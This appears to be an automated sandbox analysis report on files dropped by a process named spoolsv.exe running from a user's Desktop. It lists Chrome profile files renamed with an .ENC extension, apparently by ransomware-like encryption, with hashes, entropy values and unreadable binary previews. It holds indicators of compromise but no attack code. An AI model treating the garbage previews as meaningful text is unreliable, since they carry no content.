                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):224
                                                                                                                                                                                                                                                      Entropy (8bit):7.043700234441689
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:PLCN3oksu4AQQ+NRX+SOQ4zdCEmjQgeXFVyHGWY:PL45swYau4JBURe1VUm
                                                                                                                                                                                                                                                      MD5:4429B8F464D43854127BAEE45A983A92
                                                                                                                                                                                                                                                      SHA1:729A72EF967D8309908807A2AD7C1DF1D4BB2973
                                                                                                                                                                                                                                                      SHA-256:AE8EC3E6BFC64E6E955951702EFED78813D05FF74FE94F4CC7383A9788F7388D
                                                                                                                                                                                                                                                      SHA-512:3B8F8830E7AC3041B838CBA38D3B50AFAD741A56BCFE1907DDE83814309CC84435C6B09DB721D8DF1D327412921D1397A13DE6AED87B6A75F9DBB982F703B5AD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..H.@g...,%.../....f@.f...`..s..T.)O.;.&0[..R..S...3b....%.....t.}..ONt.u.T.<.....=>L...3]..........#.Q..|..IS...*]....U...;8.....u.......L..+...Mn.Vp.5.....J.+...RP..*%.V..E.....:...y..Q.]....5.Q...%...{0....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOCK.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):336
                                                                                                                                                                                                                                                      Entropy (8bit):7.381676315759959
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:gtCVOOuxQX8G3QNPzgXhsda2WzT+5brJ7ysQLGKIekSTVWrRSiKf+GXlijTLhg:bg9E/ip18GKI7STVVfBXCm
                                                                                                                                                                                                                                                      MD5:E1CC87693B8F436087A7525E1D95726F
                                                                                                                                                                                                                                                      SHA1:06D8B09E195CE333B78B0E925F571EC82980D4CA
                                                                                                                                                                                                                                                      SHA-256:AAFBF3167D5B1EEB96C18D97978FCF67EED1FDCA120F3E7A289CD5CEEE9922E8
                                                                                                                                                                                                                                                      SHA-512:BB31A68072903611055BDFF7ADA3708E00A66D0D0F576E5D640E731D7623458AF3702E88D10A172E1B563A10B88DBBE32D6DB4F2FF2A711BD49D45AEA9D0E6AF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:ks...jx.J.8*.!........+.Q4.....e.k.1 .8!..J%...m..G...z.b...Q.......'W.....e...=#.e......V...=.d.C...#o;.].Y...:.*.0..R.+9..M...=.v$..Wc.r...........)o.zB...5..b !.....5.....V.S..E...[.......f`..).V;..f..5.3p..7.._wvy..i^.W.{A.-.0...o.lm.....e..)..E......s6..V8/.,.....f...f.V...=.....;`..U.29..\k>........

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\MANIFEST-000001.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):48
                                                                                                                                                                                                                                                      Entropy (8bit):5.543295834054493
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:qb0z5ZjCY:+aH
                                                                                                                                                                                                                                                      MD5:00B5963CADCB5E972047846E44EE2632
                                                                                                                                                                                                                                                      SHA1:3741D074C652E62798A616ED56C811482AF90C65
                                                                                                                                                                                                                                                      SHA-256:AD5D4ADA9FA65FCFCC5B74692628D26993377029E512DC6FC103A8819650AD66
                                                                                                                                                                                                                                                      SHA-512:ACC0812854372F9CE7AE2854D5EDB6D4B02D820E275524CEDA2329495CCE7D0CB3E8455A426E67BBBAA8CA2F5C1701D68FF1444DD0318EEE647717EC264B308E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...P...`&)....Y..R.r...........yT.?.......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13340965317813669.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2688
                                                                                                                                                                                                                                                      Entropy (8bit):7.933697140119112
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:LWEnQ7yrQOh8ZLnaf/LVH0PMdSU5SUQoCF8F/o99bQ4:LWEQmrQcIYxdpA8yfk4
                                                                                                                                                                                                                                                      MD5:0533D312F9E130568D61DE78966CF9CE
                                                                                                                                                                                                                                                      SHA1:CA23B3767C5D5490CC59C6CB6C9298810FD09EB6
                                                                                                                                                                                                                                                      SHA-256:CBB80886B0F3A2AB70E0A994ABB9B298079D69A16A840DB3A72613A9B90936BD
                                                                                                                                                                                                                                                      SHA-512:7934460DEE3ED0489BD61670ECB3570D7BFA96B24741F27091B6484999BCDB556436550B9DB16FF60F5097F621592DCD5F2BF86114388893F3674BD912DF80E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:......j-.q.kL(1.R.../^sU..G....x.C...1......l,D.*..x..)...........r......M;..\..]......3...J.R...\X..ZN.R...)w...Jk...F...^N}Y<.....&E..o\..l....hN.X.^...ma.KTH...(]>...i...V.N..:..=.....).L......T(~..Ah.!.,..H..r...G........-C1..u.........}!.J.n<.Y...,T_......,..Py.."=..D?.....+..C...<.s.nP...@U5.."...a.0.....l..J{....-.&.D.3.p.b9.f........TC.1.+..j}C..".@T........x..u=i/... L.)<.._ax...*..2......[ ]..E...E2.a.....[e<Xz...aK.e.X..j...B#.#.T..s......._.....7..E.".SW!.tS.X!y,e.|.[.... ............R..x.q.C.@.8..&h....._l.P..Fky..(....t....?[.m...\./....S...d9z....bY..W..h.6m..=".....x..?.nP.{...#..]..N.n....if..+.4.E..|.b.....U`_.Q..L...3n......N7.~.C..l\m..z?..'.Y....S..B...}.D?i...%...Qm4j.ppf2y..`...-a.r]R'..<,.O....%.../......8a.#.P..?....j.`z..(D.....x..6... .zn.S...@zr..S.Q6.....lH.0.....wI]Lz....<=....'...QeQ/.T..m.......ZX..... .4......@6.H...<J_.WI......?.EX....\1.5...$g.....3[.'......ei...S.*YY........^...o.......DNt..,..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13340965342984957.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2800
                                                                                                                                                                                                                                                      Entropy (8bit):7.937539264256665
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:LVhb7GHJ2puLvnoQr/SAHbtwnhNFE2TjlUYqfJ0xNHdaGatH62qs:LP/GHakoXmtsFxNHdW62qs
                                                                                                                                                                                                                                                      MD5:CBC09663AE1A7608C203C97EAC621387
                                                                                                                                                                                                                                                      SHA1:58E3A53403AD75E381E039E8D407ADAC629D99B4
                                                                                                                                                                                                                                                      SHA-256:9294098700474E08826D8E1C50D578FB359DEF2B1838904A411A749D23B1FD72
                                                                                                                                                                                                                                                      SHA-512:C90A8D948AD916FDA68AA8359699BB3731E8EC2A045252A32633D3677CCEA3BABE1989C57F490B0B89C5B702BFCE14FB737EB34C50C2645AAB615DD488B3150A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:......j-.q.kL(1.R.../^sU..G....x.C...1......l,D.*..x..)...........r......M;..\..]......3...J.R...\X..ZN.R...)w...Jk...F...^N}Y<.....&E..o.M.....1D.....)_.c}..jt`..eYz.S..>.M...4c.H..Y..T<....@...J..7.v.......0W..I...~...`j(...7].RD...."S...[..,.....ZY.$x'........b....*k=.gb.......|.......}P..W..$6T.<..wS.(..".^.3..n..&.'n.x...~a.o.........IS..e..[.k.%.D}....H.@.q.....I^.ZBi..$+.P..VL....O......@.q.q.2i.4.H.w...'.F.R..u.bJK.m....ou.Zk.......-3....i.ma.......w:3w...E....qp.....R0...f,.-H.v.*.a.Z^.....V..pN.|,.Xo!$uz.I..J.......Q.._....+.oY.b.B{.t..P.u1...v.~.$.mE.P+...`...J..V......OA-.G..2M..\.......2?.,.7....J.f....L..."j...n...3..H.c<.. '.Y.F..3'.1...x..#...+i...U.P~..&......G{.6...>....y.f#....a..._. ^'J.....?x7....~.S'..Yt..C.E....f@..x......c..|..p.'^\...1..h,!FS....H.!....Q..@.2.JF./.".....G.+%....:Y6..$.(.&.'....&h5.m..6....?k..y.Vi,.....+a.*3.EZ.L".O...RJ.. s..a52..\.Ps.>3..W..2.9...M.Ua../..:.'...}].q..;.RH..TE].....(.U*...v.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13340965317929160.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):928
                                                                                                                                                                                                                                                      Entropy (8bit):7.7985586501266635
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:grLcRwafOt0rk9EdzwP+xMDKwVLScm50oQCcuKJ:4gwac0rk90zwWAbVLScngKJ
                                                                                                                                                                                                                                                      MD5:8B1EA9129C9067B6CF7E810E1E7F90A7
                                                                                                                                                                                                                                                      SHA1:2B7D8360FAAACCD63396C6E5B0015D23DA91D2AA
                                                                                                                                                                                                                                                      SHA-256:2246B01EADDB3B1E91622A20EEC0E98023D24813ADFAA51212C6350006DAEF62
                                                                                                                                                                                                                                                      SHA-512:02928D6C210D6AD02BA33F05F017AC9E4233D77353254C4946E241ECD277D7A241876809754F48B0FB2284FE6F290076877FC96F8EECF74C28D0A3E7F2ED2042
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:4..7.....i+=wL.c..:.."..u...).j...).J....!z....D....[..l:b].@..A.~A9.2D.&..U.....].a...|s1..%_x1..m.1........Y....4lo....MG...m.A<._y...5?......P.t.D.......6'&q6.R.U..'>\...z......ys..$s!......S..]..T....s..@....K....&.....n.(^7! .....O.....>..r...MCml.. ...e...fj....#.....^..-.ro.d...$...!...>...4.W.T.]...i.1...<R.g...~......ak.h*.+J8.+*...D1..hg.#.q.c..R.::N....<e...F.{.^...)..V.}sr..F....yaJ..#.G....z\.r{.?..F...~QM../.\Y....y..Bl.Y5..c..cgez.01.FY*Z......dc.e..8*}...+..;....(..a...w......8JA}....GE.Z..r\ .....K....T.7.....l....O....C.D...I..dSS...}3.yb.r..J.CE....."..G.5.B.OI7........#5)1.<..,=.'Q.d.....,!.x...cO..,...|:.<YV..W..w&..OW.y.......29.....0..>..v._....mw.....mk....n.Z..ABM.q_.... .%>.i.5.=.6.....]0.=O.... .j.5<U..j..k..q....=..F.tR.....pX...)6i*kbe3...O[.n.i... /..Te...8..7i..&........Hv..b.. ...O..S...*u.;.......r..........).....F@ s...M...OX~.....f0....?..Y

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13340965343135326.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):928
                                                                                                                                                                                                                                                      Entropy (8bit):7.7985586501266635
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:grLcRwafOt0rk9EdzwP+xMDKwVLScm50oQCcuKJ:4gwac0rk90zwWAbVLScngKJ
                                                                                                                                                                                                                                                      MD5:8B1EA9129C9067B6CF7E810E1E7F90A7
                                                                                                                                                                                                                                                      SHA1:2B7D8360FAAACCD63396C6E5B0015D23DA91D2AA
                                                                                                                                                                                                                                                      SHA-256:2246B01EADDB3B1E91622A20EEC0E98023D24813ADFAA51212C6350006DAEF62
                                                                                                                                                                                                                                                      SHA-512:02928D6C210D6AD02BA33F05F017AC9E4233D77353254C4946E241ECD277D7A241876809754F48B0FB2284FE6F290076877FC96F8EECF74C28D0A3E7F2ED2042
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:4..7.....i+=wL.c..:.."..u...).j...).J....!z....D....[..l:b].@..A.~A9.2D.&..U.....].a...|s1..%_x1..m.1........Y....4lo....MG...m.A<._y...5?......P.t.D.......6'&q6.R.U..'>\...z......ys..$s!......S..]..T....s..@....K....&.....n.(^7! .....O.....>..r...MCml.. ...e...fj....#.....^..-.ro.d...$...!...>...4.W.T.]...i.1...<R.g...~......ak.h*.+J8.+*...D1..hg.#.q.c..R.::N....<e...F.{.^...)..V.}sr..F....yaJ..#.G....z\.r{.?..F...~QM../.\Y....y..Bl.Y5..c..cgez.01.FY*Z......dc.e..8*}...+..;....(..a...w......8JA}....GE.Z..r\ .....K....T.7.....l....O....C.D...I..dSS...}3.yb.r..J.CE....."..G.5.B.OI7........#5)1.<..,=.'Q.d.....,!.x...cO..,...|:.<YV..W..w&..OW.y.......29.....0..>..v._....mw.....mk....n.Z..ABM.q_.... .%>.i.5.=.6.....]0.=O.... .j.5<U..j..k..q....=..F.tR.....pX...)6i*kbe3...O[.n.i... /..Te...8..7i..&........Hv..b.. ...O..S...*u.;.......r..........).....F@ s...M...OX~.....f0....?..Y

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SharedStorage.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts-journal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20496
                                                                                                                                                                                                                                                      Entropy (8bit):7.990897648973619
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:384:NBTbhAKd8+RL/tEFkIbvFx04RcVehF3l4MueYMqtR/jjgnQvhxWTUmh:NBTbhMoIrFxjRcVeH3aTb1gnyFmh
                                                                                                                                                                                                                                                      MD5:6DAD802816BFFDEFBC9CE1803ECE7991
                                                                                                                                                                                                                                                      SHA1:9F80A7B65AE5DB5855A1529CAD0F52BF4169EB11
                                                                                                                                                                                                                                                      SHA-256:EAE472F3046FCEF8C083D9A5B6D6D7152D9B8946B2B3440B4FF5840DEB87B6B4
                                                                                                                                                                                                                                                      SHA-512:019141FD38E0C050AD47076CD9440B01DD86F8DD555B031C98A5A6C47BDB52BF4B81617B38C6C68EB3E846CB1B3FBEBA18B7C3AB11FDA4B9CCEE3BD29EB47631
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:rS7n2.*........)..G......t..:y.. .r..0Or.Z.....MhG:..@siz..%./.%.-,|.....;.u.#......W&.G..UC.U.*.'.O...ggq....>.b...3P.....n..X;qdIseK.iai..V....B......".^..d.c..QfuO5~..U.Y... ....~....L;.I*..?4\........`.?..X.F2.n..V..._..N* b.WZ...q'....*.....V.p.f...v.......F.c.... 7.P......}.....<.....vg&.xz..E.r...W.Q?g_..F...>...*e..C.~..gH.-WZ.up..h....i.[b.2s@'..k.p...[....@...c....LNie.....2X.$$*e.y.h....H...T.e/..s...@.f....R..3hO.:...@.b.QU...a..W.....".7Ja..!.y.....V..J.d.?;^..E.;....2M...U...?.z...'.2.,.M+F..|Q.s..>..+...z.1S..l...I.d>.;.Vsn.^.......a..?q.-...s,.;...^.....I..,..o1.f.e.>....{...oC2....iH........=.8<..%."./.]\>......GM9.aF..q.h...Z..e..__V`.#..k.G..n..}....F.J.z..Q...mt..TR0a!K....l{|....4....(/D..../P0..l. J.d..3.@vk...Q...:D1.CZql.|N...w..+....l.M...Q................B?.MJ]U..y....eb^6....t.9\v,..?.0....k3.7m.:....!........../*.]..:..c....t$F..F...GT..F...).6.P........%dv_..d.......#i.0..wU:_^.u/.......z....l'=..._S...:=..~

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\CURRENT.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.9375
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:QRzgTczBv:Q5d
                                                                                                                                                                                                                                                      MD5:328FC1F4C693CE30D6A0FB47D34D59E3
                                                                                                                                                                                                                                                      SHA1:A49BAAFDEFA3CE958AA56709FF598FBA601A8798
                                                                                                                                                                                                                                                      SHA-256:F6F0E310BCA7FD98AA03FE19DDCBB88434AFBBBC51A64774405F82DD457CBA2B
                                                                                                                                                                                                                                                      SHA-512:B1CF96413C6D8BEB6D3A6D26CCA9068DF4B7EAD78D4C0E7454AC7D4B938BA49311B060A6C7B8277C7A8A667C6A9A674C0063EA05EAA2F205F110ADB9534A28BC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...Y.4.t*..V.h=.#..x..k..Y.$.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOCK.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):368
                                                                                                                                                                                                                                                      Entropy (8bit):7.407025390778692
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:mqwlfCbdKp25hnpQd/kRv92DFewDYy+a2CJOOtd+BBxMyfQ4vBm2XWg7eXB5N3tl:gK0chn6/UvmMzCOQ+h7Y4vE2X7eR5Ndl
                                                                                                                                                                                                                                                      MD5:280DB1CA6E0F983503843B9751C2521B
                                                                                                                                                                                                                                                      SHA1:DC285914B7B4AB623FF5448EC3D976B6EE8D4441
                                                                                                                                                                                                                                                      SHA-256:D819ED2F127F09B495F578C3D76B912F8772A7B30909F68FD121D061B1A9A9DF
                                                                                                                                                                                                                                                      SHA-512:50CC48EE6F8B92C5EFC7B3F8FF77A82EAA49402409899893FACA44702BEFF9C7AE80D95427ACF2A270F3F0AD3F3F1DD3F23C0D807D146B7DFEF15E6E4C3D0FC6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<....|......}.}."..p3..d..A/.=Y.&.3............VQ..'^....U7..z.....r.c.~...s=...y.u.....\.+..~.g..2A.&E...d.?.n....@..M....9.0h..O.Y.\.o|........."h.C...Yqw...%...Tk..ty.v ..5>....,...I....7..n.D.cIyM3..zy@.3l...=.A/.[..x.f*...z.>...n...T!.(uz..U&x....X..f.T./..4m..~.....+q.]S...|.O%.X. .y.@Xdh...!.Ht.NY.b|$.s.T.,&.k.?..c..NPi..Tt@..x..].....-.....]HhT.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.old.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):368
                                                                                                                                                                                                                                                      Entropy (8bit):7.4212536792106505
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:mqwIQLZ4ZpMcI32R3N7h+FrehKdk99yrfggDu9DLOOxmh2VDk5/ssoHv2nECG+Ef:wViM7GR3NVQdkMfdycM3pkpmP2nI
                                                                                                                                                                                                                                                      MD5:D58EB9ECF6528F093C6FD7F66F7061CC
                                                                                                                                                                                                                                                      SHA1:9AFACF1A12CDC60B492F221E25A59C7A39494728
                                                                                                                                                                                                                                                      SHA-256:FE5084578E8728325209BBA89D38AA5FEFE0153F9FFD0A182A0E3EB3FBE4CDCE
                                                                                                                                                                                                                                                      SHA-512:3111D7DADE46AA143B10214F0B5BCEE5522B79EAD67C1BD166017F359465065A1CC3285E233FC6E0B9EEA64AF5D32E7A4A80F20FC5C712B186A7273DB1E9E435
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<....|......}.zH....D.\.)......!b.W..(.Z.V.))],...p.d+....z).L<..(.......R._.U&....f..s......&V...GS..v...N=.(^R*L.G...%Z*.....I.MtV..Y.#K...."..x..2W....dx..........W.x^.[P....f...o.."\-i........#....Gx..V... ...~r.3.D..) ..(.F...n..4.y...k+..B.>..|.wHH#.... ..1..>G..-Ca_....\W.G..t.d.............9...........@..p.sV...K..<;.4..Al.......Lu-.W#].p....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\MANIFEST-000001.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):48
                                                                                                                                                                                                                                                      Entropy (8bit):5.543295834054493
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:qb0z5ZjCY:+aH
                                                                                                                                                                                                                                                      MD5:00B5963CADCB5E972047846E44EE2632
                                                                                                                                                                                                                                                      SHA1:3741D074C652E62798A616ED56C811482AF90C65
                                                                                                                                                                                                                                                      SHA-256:AD5D4ADA9FA65FCFCC5B74692628D26993377029E512DC6FC103A8819650AD66
                                                                                                                                                                                                                                                      SHA-512:ACC0812854372F9CE7AE2854D5EDB6D4B02D820E275524CEDA2329495CCE7D0CB3E8455A426E67BBBAA8CA2F5C1701D68FF1444DD0318EEE647717EC264B308E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...P...`&)....Y..R.r...........yT.?.......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8928
                                                                                                                                                                                                                                                      Entropy (8bit):7.9827969399925225
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:/gXortiALrzXJmYHvSin8f7Up4nR1KWik1rp9Rf6y89lFE71mQIlsB0hZzpKu8Ge:/jiS7JmYHvSqcwERwwpfTAFED0hZsu8L
                                                                                                                                                                                                                                                      MD5:30B55C833D936E8CC45CB361E754C850
                                                                                                                                                                                                                                                      SHA1:F023D9D37AC64624629FE128F49B20F12B69F8AA
                                                                                                                                                                                                                                                      SHA-256:56C94965B316A7D7C53DCD23F1AB25F7A40A3B901E9A5353A28E145EDB890BE0
                                                                                                                                                                                                                                                      SHA-512:74714BF182084E501D32E6787F9182DD5AEF64E65502B316AD5D47220244068FD8583F395EBDC01C41BBEF99D0227FD939AFB1DE8FCBC276739497EF1161C4D2
                                                                                                                                                                                                                                                      Malicious:false
